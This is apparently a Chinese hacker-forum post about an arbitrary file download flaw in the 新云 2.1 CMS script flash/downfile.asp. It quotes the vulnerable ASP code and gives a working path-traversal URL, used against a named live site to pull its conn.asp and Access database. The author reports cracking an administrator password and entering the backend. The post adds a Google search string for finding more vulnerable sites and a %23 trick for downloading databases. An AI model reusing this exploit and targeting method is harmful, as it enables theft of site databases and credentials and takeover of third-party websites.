菜鸟丫丫    QQ:122727223

新云2.1漏洞解析
flash/downfile.asp过滤不严导致可下载任意文件。（看一下有没有这个页面）呵呵

url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "/")

变量URL从客户端提交的路径获取，仅过滤了"'","%"和"\"
看下面

If Len(url) > 3 Then
If Left(url,1) = "/" Then
  Response.Redirect url
End If
If InStr(url,"../")<>0 Then
  Response.Redirect url
End If
strUrl = Left(url,10)
If InStr(strUrl, "://") > 0 Then
  Response.Redirect url
End If
If InStr(url, "/") > 0 Then
  strPath = Server.MapPath(".") & "\" & url
  strPath = Replace(strPath, "/", "\")
  Call downThisFile(strPath)
Else
  Response.Redirect url
End If
End If
如果在URL中包含"..\"会被转换成"../",然后跳转。

fileName = split(thePath,"\")(UBound(split(thePath,"\")))
下载文件名以"\"为标记被分割。
懂点代码的都应该知道怎么利用了吧
构造利用语句提交

flash/downfile.asp?url=uploadfile/../../conn.asp

对应的地址为：http://www.xzws.cn/flash/downfile.asp?url=uploadfile/../../conn.asp

将其下载。查看

数据库为：\database\xzws.mdb

其地址为：http://www.xzws.cn/database\xzws.mdb

我已经下载好了用数据库浏览器打开。

用这个ID登陆 hpotter 密码自己去跑 我已经跑出来了。

后台密码和前台不同 看看有其他地方没有 很容易想到论坛blog等等 呵呵，站长 进后台 呵呵。轻松搞定

 
 版权所有：就是快快
 官方网站：94KK.Com

呵呵。

这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码，软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了

如：#xzws.mdb 改成%23xzws.mdb

如此这般，数据库拿到手了 拿管理员进入。。。。之后就不做演示了。。。。友情检测，已通知管理员。